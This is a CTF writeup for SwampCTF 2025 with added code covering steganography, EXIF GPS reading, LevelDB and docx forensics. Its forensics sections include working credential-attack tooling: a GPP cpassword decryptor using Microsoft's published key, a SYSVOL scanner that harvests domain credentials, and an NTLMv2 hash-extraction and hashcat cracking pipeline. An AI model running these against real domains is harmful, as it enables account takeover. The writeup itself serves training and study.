SwampCTF 2025

Contest site: SwampCTF 2025

Contest time: 29 Mar 2025 05:00 CST - 31 Mar 2025 05:00 CST

Challenges reproduced after the event are marked with 🔁

Misc

Pretty Picture: Double Exposure

Challenge

Pretty Picture: Double Exposure

Hidden in the bits below, an image waits to be shown.

double-exposure

Solution

SwampCTF2025-1

Open the file in StegSolve and step through the bit planes; after a few clicks the flag is readable.

swampCTF{m3ss4g3s_0r_c0de_c4n_b3_h1dd3n_1n_1m4g3s}
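What StegSolve does when you "step through" the planes is isolate one bit of one channel for every pixel. The script below, an added example rather than code from the original writeup, embeds a message in the red-channel LSB of a constructed RGB image, then extracts any single bit plane, reassembles the bits into bytes and renders a plane as a plain-text PBM so it can be eyeballed. The image dimensions, the message and the row-major, MSB-first bit order are assumptions for the sample.

```python
# Added example: bit-plane extraction in pure Python (no Pillow needed).
# The cover image, the secret and the embedding order are constructed here,
# not taken from the challenge file.

def embed_lsb(pixels, message, channel=0):
    """Return a copy of the pixel list with the message bits written, MSB first,
    into the least significant bit of `channel`, one bit per pixel (row-major)."""
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    out = []
    for idx, px in enumerate(pixels):
        px = list(px)
        if idx < len(bits):
            px[channel] = (px[channel] & 0xFE) | bits[idx]
        out.append(tuple(px))
    return out

def bit_plane(pixels, channel, bit):
    """One bit of one channel for every pixel: the plane StegSolve displays."""
    return [(px[channel] >> bit) & 1 for px in pixels]

def bits_to_bytes(bits):
    """Pack a bit list (MSB first) into bytes, dropping a trailing partial byte."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        out.append(int("".join(str(b) for b in bits[i:i + 8]), 2))
    return bytes(out)

def extract_lsb_message(pixels, channel=0, bit=0, terminator=b"}"):
    """Read a plane as bytes and cut at the first terminator (a flag's closing brace)."""
    data = bits_to_bytes(bit_plane(pixels, channel, bit))
    end = data.find(terminator)
    return data[:end + 1] if end != -1 else data

def render_plane_pbm(pixels, width, height, channel, bit):
    """Plain-text PBM (P1) of one plane; open it in any image viewer to spot structure."""
    plane = bit_plane(pixels, channel, bit)
    rows = [" ".join(str(plane[r * width + c]) for c in range(width)) for r in range(height)]
    return f"P1\n{width} {height}\n" + "\n".join(rows) + "\n"

# Constructed sample: a 32x16 gradient cover image and a short secret.
WIDTH, HEIGHT = 32, 16
COVER = [((x * 7) & 0xFF, (y * 13) & 0xFF, ((x + y) * 3) & 0xFF)
         for y in range(HEIGHT) for x in range(WIDTH)]
SECRET = b"flag{bit_plane_demo}"
STEGO = embed_lsb(COVER, SECRET)

if __name__ == "__main__":
    print(extract_lsb_message(STEGO))          # the secret, recovered from plane R/bit 0
    print(render_plane_pbm(STEGO, WIDTH, HEIGHT, 0, 0))
```

Higher planes (bit 7 down to about bit 3) of a natural image look like the picture; a plane that looks like noise or like text where the picture should be is the one to dump.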

OSINT

Party Time!

Challenge

Party Time!

By: lyngo

This party house is known for its 3AM outings, but you’ve gotta work for the location if you want to come! Enter the GPS coordinates of the location!

Example: swampCTF{xx.xx.xx,xx.xx.xx}, swampCTF

Attachment: IMG_4048.HEIC

Solution

SwampCTF2025-2

The latitude and longitude are shown directly in the file's properties (the photo's EXIF GPS tags).

swampCTF{29.39.10,82.19.59}
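The numbers the Properties dialog displays come from the GPS IFD inside the photo's EXIF block. The parser below is an added example, not part of the original writeup: it walks a TIFF-structured EXIF payload (what follows the `Exif\0\0` marker in a JPEG APP1 segment, or sits in the Exif item of a HEIC; pulling the payload out of the HEIF container is left to a tool such as exiftool), follows the GPSInfo pointer and decodes the degree/minute/second rationals. The sample blob, the coordinates in it and the `flag_style` formatting are constructed assumptions, not the challenge photo's data.

```python
# Added example: minimal EXIF GPS reader. Everything below is constructed for
# illustration; the sample coordinates are not those of the challenge photo.
import struct

TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1}  # BYTE, ASCII, SHORT, LONG, RATIONAL, UNDEFINED
GPS_IFD_TAG = 0x8825                               # IFD0 entry that points at the GPS IFD
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 1, 2, 3, 4

def read_ifd(buf, off, end):
    """Yield (tag, type, count, raw) for each 12-byte entry of the IFD at `off`.
    raw is the value itself when it fits in 4 bytes, else the bytes at the stored offset."""
    (n,) = struct.unpack_from(end + "H", buf, off)
    for i in range(n):
        tag, typ, count, val = struct.unpack_from(end + "HHI4s", buf, off + 2 + 12 * i)
        size = TYPE_SIZES[typ] * count
        if size <= 4:
            raw = val[:size]
        else:
            (ptr,) = struct.unpack(end + "I", val)
            raw = buf[ptr:ptr + size]
        yield tag, typ, count, raw

def exif_gps(buf):
    """Return ((deg, min, sec, 'N'|'S'), (deg, min, sec, 'E'|'W')), or None without a GPS IFD."""
    end = {b"II": "<", b"MM": ">"}[buf[:2]]         # byte order from the TIFF header
    magic, ifd0 = struct.unpack_from(end + "HI", buf, 2)
    if magic != 42:
        raise ValueError("not a TIFF/EXIF header")
    gps_off = next((struct.unpack(end + "I", raw)[0]
                    for tag, _, _, raw in read_ifd(buf, ifd0, end) if tag == GPS_IFD_TAG), None)
    if gps_off is None:
        return None
    g = {}
    for tag, typ, count, raw in read_ifd(buf, gps_off, end):
        if tag in (GPS_LAT_REF, GPS_LON_REF):
            g[tag] = raw.rstrip(b"\0").decode("ascii")
        elif tag in (GPS_LAT, GPS_LON):                # three RATIONALs: deg, min, sec
            nums = struct.unpack(end + "II" * count, raw)
            g[tag] = [nums[i] / nums[i + 1] for i in range(0, 2 * count, 2)]
    return (*g[GPS_LAT], g[GPS_LAT_REF]), (*g[GPS_LON], g[GPS_LON_REF])

def flag_style(buf):
    """dd.mm.ss,dd.mm.ss as the challenge's example flag is written (assumed rounding of seconds)."""
    lat, lon = exif_gps(buf)
    fmt = lambda c: f"{int(c[0])}.{int(c[1])}.{int(round(c[2]))}"
    return f"swampCTF{{{fmt(lat)},{fmt(lon)}}}"

def build_sample_exif(lat_dms, lat_ref, lon_dms, lon_ref):
    """Constructed little-endian EXIF blob: header | IFD0 (one GPSInfo entry) | GPS IFD | rationals."""
    ifd0_off, gps_off, lat_off, lon_off = 8, 26, 80, 104
    hdr = b"II" + struct.pack("<HI", 42, ifd0_off)
    ifd0 = struct.pack("<HHHII", 1, GPS_IFD_TAG, 4, 1, gps_off) + struct.pack("<I", 0)
    ascii_entry = lambda tag, s: struct.pack("<HHI", tag, 2, 2) + s.encode() + b"\0\0\0"
    gps = (struct.pack("<H", 4)
           + ascii_entry(GPS_LAT_REF, lat_ref) + struct.pack("<HHII", GPS_LAT, 5, 3, lat_off)
           + ascii_entry(GPS_LON_REF, lon_ref) + struct.pack("<HHII", GPS_LON, 5, 3, lon_off)
           + struct.pack("<I", 0))
    rationals = lambda dms: b"".join(struct.pack("<II", n, d) for n, d in dms)
    return hdr + ifd0 + gps + rationals(lat_dms) + rationals(lon_dms)

# Constructed sample coordinates (not the challenge photo's).
SAMPLE_EXIF = build_sample_exif([(40, 1), (26, 1), (4626, 100)], "N", [(79, 1), (56, 1), (55, 1)], "W")

if __name__ == "__main__":
    print(exif_gps(SAMPLE_EXIF))
    print(flag_style(SAMPLE_EXIF))
```

The same IFD walker handles big-endian ("MM") files unchanged; only the byte-order prefix differs. Real phones also store GPSAltitude, GPSTimeStamp and GPSDateStamp in the same IFD, which is why an OSINT challenge should be checked for more than the coordinates.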

Party Time! Level 2

Challenge

Party Time! Level 2

The party just ended, but people are hungry. Find the nearest fast food spot to see where everyone went!

The flag format is swampCTF{…}. You will not need to wrap it yourself.

Hint

The reviews love the racecar fast service.

Solution

First, I located the actual place from Level 1: Gainesville, Florida (Google Maps).

SwampCTF2025-3

Then I searched for fast-food restaurants nearby.

SwampCTF2025-4

That turned up this review, which matches the hint:

swampCTF{Checkers_Yum}

Forensics

Preferential Treatment

Challenge

Preferential Treatment

We have an old Windows Server 2008 instance that we lost the password for. Can you see if you can find one in this packet capture?

gpnightmare.pcap

Solution

Searching the capture for the string "CTF" turned up this packet:

SwampCTF2025-5

Following the stream revealed this XML (a Groups.xml preference file):

SwampCTF2025-6

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EC16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-52E5-4d24-8B1A-D9BDE98BA1D1}" name="swampctf.com\Administrator" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="dAw7VQvfj9rs53A8t4PudTVf85Ca5cmC1Xjx6TpI/cS8WD4D8DXbKiWIZslihdJw3Rf+ijboX7FgLW7pF0K6x7dfhQ8gxLq34ENGjN8eTOI=" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="swampctf.com\Administrator"/>
  </User>
</Groups>

Some searching gave the background. Group Policy Preferences (GPP), introduced with Windows Server 2008, let administrators create and update local accounts, including their passwords, through Group Policy. The password is stored in the cpassword attribute of the preference XML (Groups.xml here, which lives in SYSVOL and is readable by every domain user), encrypted with AES-256 in CBC mode with a zero IV. Microsoft used one static, hard-coded key for every cpassword and published it on MSDN, so anyone who can read the file can decrypt it. MS14-025 (2014) removed the ability to save new passwords this way but does not remove existing ones, which is why old Groups.xml files still turn up on engagements.

The published AES key (hex):

4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

Solver script (requires pycryptodome):

import base64
from Crypto.Cipher import AES  # pip install pycryptodome

# Static AES-256 key Microsoft published for GPP cpassword values
AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

def decrypt_cpassword(cpassword):
    # GPP strips the '=' padding from the base64 string; restore it before decoding
    cpassword += "=" * (-len(cpassword) % 4)
    encrypted_password = base64.b64decode(cpassword)
    # AES-256-CBC with an all-zero IV
    cipher = AES.new(AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16)
    decrypted_password = cipher.decrypt(encrypted_password)
    # strip the PKCS#7 padding; the plaintext is UTF-16LE, not ASCII
    decrypted_password = decrypted_password[:-decrypted_password[-1]]
    return decrypted_password.decode("utf-16-le")

cpassword = "dAw7VQvfj9rs53A8t4PudTVf85Ca5cmC1Xjx6TpI/cS8WD4D8DXbKiWIZslihdJw3Rf+ijboX7FgLW7pF0K6x7dfhQ8gxLq34ENGjN8eTOI="
print(decrypt_cpassword(cpassword))

Running it prints the flag:

swampCTF{4v3r463_w1nd0w5_53cur17y}
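Outside a CTF the same weakness is usually hunted across a whole SYSVOL share rather than one captured file, and cpassword turns up in more than Groups.xml (Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml can all carry one, each naming the account with a different attribute). The scanner below is an added example, not code from the original writeup: it walks a directory tree, parses every preference file type, extracts every cpassword with the account it belongs to, restores the base64 padding GPP strips, and decrypts with the static key when pycryptodome is installed. The two sample XML files are constructed in-memory (clsid attributes omitted, dummy cpassword values) and are not the challenge's capture.

```python
# Added example: SYSVOL-wide cpassword scanner. Sample files below are constructed.
import base64
import os
import xml.etree.ElementTree as ET

# Microsoft's published static key (AES-256-CBC, zero IV)
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
# Preference files under Policies\{GUID}\{Machine,User}\Preferences\ that can carry a cpassword
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Drives.xml", "Printers.xml"}
# The attribute naming the account differs per file type
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def fix_b64_padding(s):
    """GPP writes cpassword without trailing '='; b64decode rejects that unless restored."""
    return s + "=" * (-len(s) % 4)

def find_cpasswords(xml_text):
    """[(account, cpassword)] for every Properties element that has a cpassword attribute."""
    found = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.get("cpassword")
        if cp:
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "(unknown)")
            found.append((account, cp))
    return found

def decrypt_cpassword(cpassword):
    """Static-key decrypt; plaintext is UTF-16LE with PKCS#7 padding. Needs pycryptodome."""
    from Crypto.Cipher import AES
    ct = base64.b64decode(fix_b64_padding(cpassword))
    pt = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(ct)
    return pt[:-pt[-1]].decode("utf-16-le")

def scan_sysvol(root_dir):
    """Walk a SYSVOL copy; return [(path, account, cpassword)] for every embedded credential."""
    hits = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as f:   # GPP files often start with a BOM
                    hits += [(path, acct, cp) for acct, cp in find_cpasswords(f.read())]
    return hits

# Constructed samples: a Groups.xml whose cpassword lost its padding, and a
# ScheduledTasks.xml naming its account through runAs. Values are dummies.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" image="2">
    <Properties action="U" cpassword="AAECAwQFBgcICQoLDA0ODw" userName="LocalAdmin"/>
  </User>
</Groups>"""
SAMPLE_TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="Backup">
    <Properties action="C" runAs="CORP\\svc_backup" cpassword="EBESExQVFhcYGRobHB0eHw=="/>
  </Task>
</ScheduledTasks>"""

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as sysvol:
        for sub, name, text in (("Machine/Preferences/Groups", "Groups.xml", SAMPLE_GROUPS_XML),
                                ("Machine/Preferences/ScheduledTasks", "ScheduledTasks.xml", SAMPLE_TASKS_XML)):
            os.makedirs(os.path.join(sysvol, sub))
            with open(os.path.join(sysvol, sub, name), "w", encoding="utf-8") as f:
                f.write(text)
        for path, account, cp in scan_sysvol(sysvol):
            try:
                shown = decrypt_cpassword(cp)
            except ImportError:
                shown = "(install pycryptodome to decrypt)"
            print(f"{path}: {account} -> {shown}")
```

The dummy cpassword values decrypt to garbage (they are not real ciphertexts), which is fine for exercising the padding and extraction logic; point the scanner at a mounted SYSVOL or a copy of `\\<dc>\SYSVOL\<domain>\Policies` for real results.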

🔁MuddyWater

Challenge

MuddyWater

We caught a threat actor, called MuddyWater, bruteforcing a login for our Domain Controller. We have a packet capture of the intrusion. Can you figure out which account they logged in to and what the password is?

Flag format is swampCTF{<username>:<password>}

muddywater.pcap

Solution

SwampCTF2025-7

The protocol hierarchy shows that SMB2 accounts for the largest share of packets.

Since the challenge asks which account they logged in to, one of the attempts must have succeeded, so the first step is to filter for the successful logon.

smb2.cmd == 0x01 selects SMB2 SESSION_SETUP, the command that carries the NTLMSSP authentication exchange (NEGOTIATE is 0x00).

nt_status == 0x00000000 is STATUS_SUCCESS. The intermediate SESSION_SETUP responses in an NTLM handshake carry STATUS_MORE_PROCESSING_REQUIRED (0xC0000016); only the final response of a successful logon returns STATUS_SUCCESS.

Combining the two gives this filter:

smb2.nt_status == 0x00000000 && smb2.cmd == 0x01

SwampCTF2025-8

The filter leaves exactly one exchange.

I followed the stream, exported those 28 packets to a new pcap and uploaded it to apackets (an online tool that extracts Net-NTLMv2 hashes from captures).

SwampCTF2025-9

The hashcat (mode 5600) Net-NTLMv2 line has the form <username>::<domain>:<server_challenge>:<NTProofStr>:<blob>; the server challenge comes from the NTLMSSP CHALLENGE message and the NTProofStr (first 16 bytes of the NTLMv2 response) and blob from the AUTHENTICATE message. When hashcat cracks it, it appends :<password> to the line.

This gave the Net-NTLMv2 hash:

hackbackzip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

Save it to hash.txt and crack it with hashcat against rockyou.txt:

hashcat -m 5600 hash.txt ./wordlists/rockyou.txt

SwampCTF2025-10

So the account is hackbackzip and the password is pikeplace:

swampCTF{hackbackzip:pikeplace}
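The online tool hides what it actually did with those 28 packets: it pulled the NTLMSSP CHALLENGE and AUTHENTICATE blobs out of the SESSION_SETUP requests and responses and rearranged their fields into the hashcat line. The block below is an added example, not part of the original writeup or of any tool: it parses the two NTLMSSP messages, builds the mode-5600 line, and also recomputes the NTLMv2 proof for a candidate password (the HMAC-MD5 chain from MS-NLMP that hashcat evaluates per guess) so a cracked password can be verified offline. MD4 is implemented in pure Python because hashlib's md4 is disabled under OpenSSL 3 on many systems. The exchange (user alice, domain CORP, password Summer2025!, the server and client challenges) is constructed, not taken from muddywater.pcap; in Wireshark the real blobs are reachable through the ntlmssp.messagetype field.

```python
# Added example: NTLMSSP -> hashcat 5600 line, plus offline candidate verification.
# All sample messages below are constructed, not from the challenge capture.
import hashlib
import hmac
import struct

M32 = 0xFFFFFFFF

def md4(data):
    """RFC 1320 MD4. NT hash = MD4(UTF-16LE(password))."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda v, s: (((v & M32) << s) | ((v & M32) >> (32 - s))) & M32
    rounds = ((F, 0x00000000, range(16), (3, 7, 11, 19)),
              (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
              (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)))
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):   # register rotation replaces the unrolled 48 steps
                a, b, c, d = d, rol(a + fn(b, c, d) + X[idx] + k, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)

def _sec_buf(msg, off):
    """NTLMSSP security buffer: Len(2) MaxLen(2) Offset(4) -> the referenced bytes."""
    length, _, start = struct.unpack_from("<HHI", msg, off)
    return msg[start:start + length]

def parse_challenge(msg):
    """CHALLENGE_MESSAGE (type 2): the 8-byte ServerChallenge sits at offset 24."""
    assert msg[:8] == b"NTLMSSP\0" and struct.unpack_from("<I", msg, 8)[0] == 2
    return msg[24:32]

def parse_authenticate(msg):
    """AUTHENTICATE_MESSAGE (type 3): NtChallengeResponse @20, DomainName @28, UserName @36."""
    assert msg[:8] == b"NTLMSSP\0" and struct.unpack_from("<I", msg, 8)[0] == 3
    return _sec_buf(msg, 36).decode("utf-16-le"), _sec_buf(msg, 28).decode("utf-16-le"), _sec_buf(msg, 20)

def hashcat_5600(challenge_msg, auth_msg):
    """user::domain:serverchallenge:NTProofStr:blob (NTLMv2 response = NTProofStr(16) || blob)."""
    chal = parse_challenge(challenge_msg)
    user, domain, nt_resp = parse_authenticate(auth_msg)
    return f"{user}::{domain}:{chal.hex()}:{nt_resp[:16].hex()}:{nt_resp[16:].hex()}"

def ntlmv2_proof(password, user, domain, server_chal, blob):
    """MS-NLMP NTOWFv2 then the proof: what hashcat recomputes for every candidate."""
    v2_hash = hmac.new(md4(password.encode("utf-16-le")),
                       (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(v2_hash, server_chal + blob, hashlib.md5).digest()

def check_candidate(line, password):
    user, _, domain, chal, proof, blob = line.split(":")
    return ntlmv2_proof(password, user, domain, bytes.fromhex(chal), bytes.fromhex(blob)).hex() == proof

# ---- constructed sample exchange: alice@CORP, assumed password Summer2025! ----
def build_challenge(server_chal, target_name, target_info):
    tn = target_name.encode("utf-16-le")
    hdr = b"NTLMSSP\0" + struct.pack("<IHHI", 2, len(tn), len(tn), 56) + struct.pack("<I", 0xE28A8215)
    hdr += server_chal + b"\0" * 8 + struct.pack("<HHI", len(target_info), len(target_info), 56 + len(tn)) + b"\0" * 8
    return hdr + tn + target_info

def build_authenticate(user, domain, nt_resp):
    payload = [b"\0" * 24, nt_resp, domain.encode("utf-16-le"), user.encode("utf-16-le"),
               "WS01".encode("utf-16-le"), b""]                 # Lm, Nt, Domain, User, Workstation, SessionKey
    hdr, off = b"NTLMSSP\0" + struct.pack("<I", 3), 88
    for p in payload:
        hdr += struct.pack("<HHI", len(p), len(p), off)
        off += len(p)
    return hdr + struct.pack("<I", 0xE2888215) + b"\0" * 24 + b"".join(payload)  # flags, version, MIC

SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
TARGET_INFO = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le") + b"\0\0\0\0"   # MsvAvNbDomainName, MsvAvEOL
BLOB = (b"\x01\x01\0\0\0\0\0\0" + bytes(8) + bytes.fromhex("a1a2a3a4a5a6a7a8")      # version, timestamp, client challenge
        + bytes(4) + TARGET_INFO + bytes(4))
CHALLENGE_MSG = build_challenge(SERVER_CHALLENGE, "CORP", TARGET_INFO)
AUTH_MSG = build_authenticate("alice", "CORP",
                              ntlmv2_proof("Summer2025!", "alice", "CORP", SERVER_CHALLENGE, BLOB) + BLOB)
HASH_LINE = hashcat_5600(CHALLENGE_MSG, AUTH_MSG)

if __name__ == "__main__":
    print(HASH_LINE)
    print(check_candidate(HASH_LINE, "Summer2025!"), check_candidate(HASH_LINE, "pikeplace"))
```

Two details matter when doing this by hand from a capture: the server challenge must come from the CHALLENGE message of the same session as the AUTHENTICATE (a brute-forcing client opens many sessions, each with its own challenge), and the user name is upper-cased but the domain is used as sent when deriving the NTLMv2 key, so a wrong-case domain in the line makes every candidate fail.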

🔁Planetary Storage

Challenge

Planetary Storage

My friend found this strange file while perusing his computer, but we can’t read it. Can you figure out what it is and get the information from it?

Difficulty: Easy/Medium

The flag is in the standard format.

PlanetaryStorage.zip

Solution

Despite the extension, these are not Microsoft Access lock files (which also use .ldb). Six-digit numbered files such as 000010.ldb are LevelDB table files (SSTables), and LevelDB is the key-value store IPFS uses for its local datastore, which fits both the challenge name ("Planetary Storage" for the InterPlanetary File System) and the flag text.

Checking the three .ldb files one by one, the flag turned up in the stored values of 000010.ldb.

SwampCTF2025-11

SwampCTF2025-12

swampCTF{1pf5-b453d-d474b453}
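LevelDB stores key/value pairs in table files made of data blocks whose keys are prefix-compressed, so a raw strings dump shows values but mangles keys. The parser below is an added example, not part of the original writeup: it decodes one uncompressed data block, restores the shared key prefixes from the restart-point layout, and strips the 8-byte sequence/type trailer LevelDB appends to every user key. The block it parses is built in memory with IPFS-style keys and is not the challenge file. Reading a complete .ldb additionally requires parsing the 48-byte footer and the index block and, where a block's trailer type byte is 1, snappy-decompressing it; those steps are not included here.

```python
# Added example: LevelDB data-block decoder. The sample block is constructed.
import re
import struct

def read_varint32(buf, pos):
    """LevelDB varint: 7 data bits per byte, low group first, high bit = continue."""
    result, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7

def put_varint32(v):
    out = bytearray()
    while v >= 0x80:
        out.append((v & 0x7F) | 0x80)
        v >>= 7
    out.append(v)
    return bytes(out)

def parse_data_block(block):
    """Decode every entry of an uncompressed data block (block contents only, without the
    5-byte type+CRC trailer). Returns [(user_key, sequence, kind, value)]."""
    (num_restarts,) = struct.unpack_from("<I", block, len(block) - 4)
    end = len(block) - 4 - 4 * num_restarts        # entries stop where the restart array begins
    pos, prev_key, entries = 0, b"", []
    while pos < end:
        shared, pos = read_varint32(block, pos)      # bytes shared with the previous key
        non_shared, pos = read_varint32(block, pos)  # bytes that follow in this entry
        value_len, pos = read_varint32(block, pos)
        key = prev_key[:shared] + block[pos:pos + non_shared]
        pos += non_shared
        value = block[pos:pos + value_len]
        pos += value_len
        user_key, tag = key[:-8], struct.unpack("<Q", key[-8:])[0]   # internal key = user key || (seq<<8 | type)
        entries.append((user_key, tag >> 8, "value" if tag & 0xFF == 1 else "deletion", value))
        prev_key = key
    return entries

def find_flags(entries, pattern=rb"swampCTF\{[^}]*\}"):
    """Regex over the decoded values only, so keys cannot produce false hits."""
    return [m.group(0) for _, _, _, value in entries for m in re.finditer(pattern, value)]

def build_data_block(items, restart_interval=16):
    """Encode sorted (user_key, seq, value) triples the way LevelDB's BlockBuilder does."""
    out, restarts, prev_key = bytearray(), [], b""
    for i, (ukey, seq, value) in enumerate(items):
        key = ukey + struct.pack("<Q", (seq << 8) | 1)
        if i % restart_interval == 0:
            restarts.append(len(out))
            prev_key = b""                           # no prefix sharing across a restart point
        shared = 0
        while shared < min(len(prev_key), len(key)) and prev_key[shared] == key[shared]:
            shared += 1
        out += put_varint32(shared) + put_varint32(len(key) - shared) + put_varint32(len(value))
        out += key[shared:] + value
        prev_key = key
    for r in restarts:
        out += struct.pack("<I", r)
    out += struct.pack("<I", len(restarts))
    return bytes(out)

# Constructed sample: IPFS-style datastore keys, one value carrying a flag-shaped string.
SAMPLE_BLOCK = build_data_block([
    (b"/blocks/CIQA", 7, b"hello"),
    (b"/blocks/CIQB", 8, b"the secret is swampCTF{constructed_sample}"),
    (b"/config", 9, b'{"Datastore":"leveldb"}'),
])

if __name__ == "__main__":
    for user_key, seq, kind, value in parse_data_block(SAMPLE_BLOCK):
        print(seq, kind, user_key, value)
    print(find_flags(parse_data_block(SAMPLE_BLOCK)))
```

The deletion type is worth keeping in the output: a key whose latest entry is a tombstone has been "deleted" from the database's point of view, but an older entry for it may still sit in a lower-level table file, which is exactly the kind of leftover forensics looks for.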

🔁Homework Help

Challenge

Homework Help

I accidentally lost some of my class notes! Can you help me recover them? (Note: Unzipped size is 4GB)

SWAMP_D_image.zip

Solution

SwampCTF2025-13

I opened the downloaded disk image in FTK and found this deleted .docx in the Hacking folder.

Recovering the document reveals the flag:

SwampCTF2025-14

swampCTF{n0thing_i5_3v3r_d3l3t3d}
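FTK recovers the file through its still-present file-system record. When that record has been reused, signature carving still works, because deleting a file leaves its clusters intact until something overwrites them. The carver below is an added example, not part of the original writeup: it scans a raw image for ZIP local-file headers, cuts each candidate at the following end-of-central-directory record (honouring the comment length), keeps the spans Python's zipfile can open, and pulls the paragraph text out of word/document.xml for the ones that are .docx files. The "image" is constructed in memory (a minimal docx between filler bytes); it is not the challenge's SWAMP_D_image.

```python
# Added example: signature-carve .docx files from a raw image and read their text.
# The image below is constructed; nothing here comes from the challenge file.
import io
import re
import struct
import zipfile

LOCAL_HDR, EOCD = b"PK\x03\x04", b"PK\x05\x06"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

def make_docx(text):
    """Smallest structure that still parses as a .docx (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>{text}</w:t></w:r></w:p></w:body></w:document>')
    return buf.getvalue()

def carve_zips(image):
    """Yield (offset, bytes) for every local-header..EOCD span that opens as a ZIP archive."""
    pos = 0
    while (start := image.find(LOCAL_HDR, pos)) != -1:
        eocd = image.find(EOCD, start)
        if eocd == -1:
            break
        (comment_len,) = struct.unpack_from("<H", image, eocd + 20)   # EOCD is 22 bytes + comment
        blob = image[start:eocd + 22 + comment_len]
        try:
            zipfile.ZipFile(io.BytesIO(blob)).close()                # central directory must be sane
        except zipfile.BadZipFile:
            pos = start + 4                                          # false positive: keep scanning
            continue
        yield start, blob
        pos = eocd + 22 + comment_len                                # skip the members' own PK headers

def docx_text(blob):
    """Concatenated <w:t> runs from word/document.xml, or None if this ZIP is not a docx."""
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        if "word/document.xml" not in z.namelist():
            return None
        xml = z.read("word/document.xml").decode("utf-8")
    return "".join(re.findall(r"<w:t[^>]*>([^<]*)</w:t>", xml))

def recover_docx_text(image):
    """[(offset, text)] for every carved ZIP that turns out to be a Word document."""
    return [(off, t) for off, blob in carve_zips(image) if (t := docx_text(blob)) is not None]

# Constructed "disk image": filler, one deleted-looking docx, more filler.
FILLER = b"\x00" * 4096 + b"unrelated NTFS data " * 50
IMAGE = FILLER + make_docx("class notes: swampCTF{constructed_sample}") + b"\xff" * 2048

if __name__ == "__main__":
    for offset, text in recover_docx_text(IMAGE):
        print(f"docx at offset {offset}: {text}")
```

On a real 4 GB image, read it with mmap rather than into memory, and expect fragmentation: a docx whose clusters are not contiguous will not open from its first header, which is where the file-system metadata that FTK uses beats blind carving.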